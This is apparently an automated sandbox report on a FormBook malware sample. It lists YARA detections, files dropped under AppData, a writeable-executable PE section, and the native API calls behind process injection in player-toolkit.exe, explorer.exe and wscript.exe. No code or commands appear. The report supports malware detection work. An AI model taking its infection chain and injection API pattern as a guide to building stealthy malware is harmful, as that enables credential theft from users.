Source: Yara match	File source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware

Show sources

Source: C:\Windows\SysWOW64\wscript.exe	Dropped file: C:\Users\user\AppData\Roaming\0NN3-705\0NNlogri.ini			Jump to dropped file
Source: C:\Windows\SysWOW64\wscript.exe	Dropped file: C:\Users\user\AppData\Roaming\0NN3-705\0NNlogrv.ini			Jump to dropped file

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

PE file has a writeable .text section

Show sources

Source: player-toolkit.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00029D50 NtCreateFile,	2_2_00029D50
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00029E00 NtReadFile,	2_2_00029E00
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00029E80 NtClose,	2_2_00029E80
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00029F30 NtAllocateVirtualMemory,	2_2_00029F30
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00029E7C NtClose,	2_2_00029E7C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00029F2D NtAllocateVirtualMemory,	2_2_00029F2D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999A00 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_02999A00
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999A20 NtResumeThread,LdrInitializeThunk,	2_2_02999A20
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999A50 NtCreateFile,LdrInitializeThunk,	2_2_02999A50
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029998F0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_029998F0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999840 NtDelayExecution,LdrInitializeThunk,	2_2_02999840
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_02999860
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029999A0 NtCreateSection,LdrInitializeThunk,	2_2_029999A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_02999910
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029996E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_029996E0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_02999660
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999780 NtMapViewOfSection,LdrInitializeThunk,	2_2_02999780
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029997A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_029997A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999710 NtQueryInformationToken,LdrInitializeThunk,	2_2_02999710
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029995D0 NtClose,LdrInitializeThunk,	2_2_029995D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999540 NtReadFile,LdrInitializeThunk,	2_2_02999540
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999A80 NtOpenDirectoryObject,	2_2_02999A80
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999A10 NtQuerySection,	2_2_02999A10
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0299A3B0 NtGetContextThread,	2_2_0299A3B0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999B00 NtSetValueKey,	2_2_02999B00
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029998A0 NtWriteVirtualMemory,	2_2_029998A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999820 NtEnumerateKey,	2_2_02999820
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0299B040 NtSuspendThread,	2_2_0299B040
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029999D0 NtCreateProcessEx,	2_2_029999D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999950 NtQueueApcThread,	2_2_02999950
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029996D0 NtCreateKey,	2_2_029996D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999610 NtEnumerateValueKey,	2_2_02999610
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999650 NtQueryValueKey,	2_2_02999650
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999670 NtQueryInformationProcess,	2_2_02999670
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999FE0 NtCreateMutant,	2_2_02999FE0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0299A710 NtOpenProcessToken,	2_2_0299A710
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999730 NtQueryVirtualMemory,	2_2_02999730
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999770 NtSetInformationFile,	2_2_02999770
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0299A770 NtOpenThread,	2_2_0299A770
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999760 NtOpenProcess,	2_2_02999760
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029995F0 NtQueryInformationFile,	2_2_029995F0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0299AD30 NtSetContextThread,	2_2_0299AD30
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999520 NtWaitForSingleObject,	2_2_02999520
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999560 NtWriteFile,	2_2_02999560
Source: C:\Windows\explorer.exe	Code function: 19_2_065BFA32 NtCreateFile,NtReadFile,NtClose,	19_2_065BFA32
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B395D0 NtClose,LdrInitializeThunk,	24_2_04B395D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39560 NtWriteFile,LdrInitializeThunk,	24_2_04B39560
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39540 NtReadFile,LdrInitializeThunk,	24_2_04B39540
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B396E0 NtFreeVirtualMemory,LdrInitializeThunk,	24_2_04B396E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B396D0 NtCreateKey,LdrInitializeThunk,	24_2_04B396D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39610 NtEnumerateValueKey,LdrInitializeThunk,	24_2_04B39610
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39660 NtAllocateVirtualMemory,LdrInitializeThunk,	24_2_04B39660
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39650 NtQueryValueKey,LdrInitializeThunk,	24_2_04B39650
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39780 NtMapViewOfSection,LdrInitializeThunk,	24_2_04B39780
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39FE0 NtCreateMutant,LdrInitializeThunk,	24_2_04B39FE0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39710 NtQueryInformationToken,LdrInitializeThunk,	24_2_04B39710
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39770 NtSetInformationFile,LdrInitializeThunk,	24_2_04B39770
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39860 NtQuerySystemInformation,LdrInitializeThunk,	24_2_04B39860
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39840 NtDelayExecution,LdrInitializeThunk,	24_2_04B39840
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B399A0 NtCreateSection,LdrInitializeThunk,	24_2_04B399A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39910 NtAdjustPrivilegesToken,LdrInitializeThunk,	24_2_04B39910
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39A50 NtCreateFile,LdrInitializeThunk,	24_2_04B39A50
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39B00 NtSetValueKey,LdrInitializeThunk,	24_2_04B39B00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B395F0 NtQueryInformationFile,	24_2_04B395F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B3AD30 NtSetContextThread,	24_2_04B3AD30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39520 NtWaitForSingleObject,	24_2_04B39520
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39670 NtQueryInformationProcess,	24_2_04B39670
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B397A0 NtUnmapViewOfSection,	24_2_04B397A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39730 NtQueryVirtualMemory,	24_2_04B39730
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B3A710 NtOpenProcessToken,	24_2_04B3A710
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B3A770 NtOpenThread,	24_2_04B3A770
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39760 NtOpenProcess,	24_2_04B39760
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B398A0 NtWriteVirtualMemory,	24_2_04B398A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B398F0 NtReadVirtualMemory,	24_2_04B398F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39820 NtEnumerateKey,	24_2_04B39820
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B3B040 NtSuspendThread,	24_2_04B3B040
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B399D0 NtCreateProcessEx,	24_2_04B399D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39950 NtQueueApcThread,	24_2_04B39950
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39A80 NtOpenDirectoryObject,	24_2_04B39A80
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39A20 NtResumeThread,	24_2_04B39A20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39A10 NtQuerySection,	24_2_04B39A10
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39A00 NtProtectVirtualMemory,	24_2_04B39A00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B3A3B0 NtGetContextThread,	24_2_04B3A3B0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E9D50 NtCreateFile,	24_2_003E9D50
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E9E00 NtReadFile,	24_2_003E9E00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E9E80 NtClose,	24_2_003E9E80
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E9F30 NtAllocateVirtualMemory,	24_2_003E9F30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E9E7C NtClose,	24_2_003E9E7C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E9F2D NtAllocateVirtualMemory,	24_2_003E9F2D

Source: C:\Users\user\Desktop\focus.exe

Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403348

Source: C:\Users\user\Desktop\focus.exe	Code function: 0_2_00406945	0_2_00406945
Source: C:\Users\user\Desktop\focus.exe	Code function: 0_2_0040711C	0_2_0040711C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00011030	2_2_00011030
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002D986	2_2_0002D986
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002E241	2_2_0002E241
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002DAA6	2_2_0002DAA6
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002D2D0	2_2_0002D2D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002DB23	2_2_0002DB23
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002DCEB	2_2_0002DCEB
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00012D87	2_2_00012D87
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00012D90	2_2_00012D90
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00019E2B	2_2_00019E2B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00019E30	2_2_00019E30
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002DF20	2_2_0002DF20
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002CF93	2_2_0002CF93
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00012FB0	2_2_00012FB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A222AE	2_2_02A222AE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF	2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A0FA2B	2_2_02A0FA2B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B236	2_2_0297B236
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298138B	2_2_0298138B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298EBB0	2_2_0298EBB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298ABD8	2_2_0298ABD8
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A023E3	2_2_02A023E3
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1DBD2	2_2_02A1DBD2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A103DA	2_2_02A103DA
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A22B28	2_2_02A22B28
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029FCB4F	2_2_029FCB4F
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297AB40	2_2_0297AB40
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296B090	2_2_0296B090
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A220A8	2_2_02A220A8
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029820A0	2_2_029820A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A228EC	2_2_02A228EC
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A2E824	2_2_02A2E824
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11002	2_2_02A11002
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A830	2_2_0297A830
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF	2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295F900	2_2_0295F900
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02974120	2_2_02974120
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A22EF7	2_2_02A22EF7
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02976E30	2_2_02976E30
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1D616	2_2_02A1D616
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A21FF1	2_2_02A21FF1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A2DFCE	2_2_02A2DFCE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496	2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296841F	2_2_0296841F
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1D466	2_2_02A1D466
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477	2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982581	2_2_02982581
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12D82	2_2_02A12D82
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296D5E0	2_2_0296D5E0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A225DD	2_2_02A225DD
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A22D07	2_2_02A22D07
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02950D20	2_2_02950D20
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A21D55	2_2_02A21D55
Source: C:\Windows\explorer.exe	Code function: 19_2_065BFA32	19_2_065BFA32
Source: C:\Windows\explorer.exe	Code function: 19_2_065B6072	19_2_065B6072
Source: C:\Windows\explorer.exe	Code function: 19_2_065B6069	19_2_065B6069
Source: C:\Windows\explorer.exe	Code function: 19_2_065C2A6F	19_2_065C2A6F
Source: C:\Windows\explorer.exe	Code function: 19_2_065BE862	19_2_065BE862
Source: C:\Windows\explorer.exe	Code function: 19_2_065B7CF2	19_2_065B7CF2
Source: C:\Windows\explorer.exe	Code function: 19_2_065B7CEC	19_2_065B7CEC
Source: C:\Windows\explorer.exe	Code function: 19_2_065BAB1F	19_2_065BAB1F
Source: C:\Windows\explorer.exe	Code function: 19_2_065C2B0E	19_2_065C2B0E
Source: C:\Windows\explorer.exe	Code function: 19_2_065BD132	19_2_065BD132
Source: C:\Windows\explorer.exe	Code function: 19_2_065BAB22	19_2_065BAB22
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496	24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B0841F	24_2_04B0841F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477	24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BBD466	24_2_04BBD466
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B22581	24_2_04B22581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB2D82	24_2_04BB2D82
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B0D5E0	24_2_04B0D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC25DD	24_2_04BC25DD
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04AF0D20	24_2_04AF0D20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC2D07	24_2_04BC2D07
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC1D55	24_2_04BC1D55
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC2EF7	24_2_04BC2EF7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B16E30	24_2_04B16E30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BBD616	24_2_04BBD616
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC1FF1	24_2_04BC1FF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BCDFCE	24_2_04BCDFCE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B220A0	24_2_04B220A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC20A8	24_2_04BC20A8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B0B090	24_2_04B0B090
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC28EC	24_2_04BC28EC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1A830	24_2_04B1A830
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BCE824	24_2_04BCE824
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1002	24_2_04BB1002
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B199BF	24_2_04B199BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B14120	24_2_04B14120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04AFF900	24_2_04AFF900
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC22AE	24_2_04BC22AE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4AEF	24_2_04BB4AEF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B236	24_2_04B1B236
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BAFA2B	24_2_04BAFA2B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2EBB0	24_2_04B2EBB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2138B	24_2_04B2138B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BA23E3	24_2_04BA23E3
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB03DA	24_2_04BB03DA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BBDBD2	24_2_04BBDBD2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2ABD8	24_2_04B2ABD8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC2B28	24_2_04BC2B28
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1A309	24_2_04B1A309
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1AB40	24_2_04B1AB40
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B9CB4F	24_2_04B9CB4F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003EE241	24_2_003EE241
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003D2D90	24_2_003D2D90
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003D2D87	24_2_003D2D87
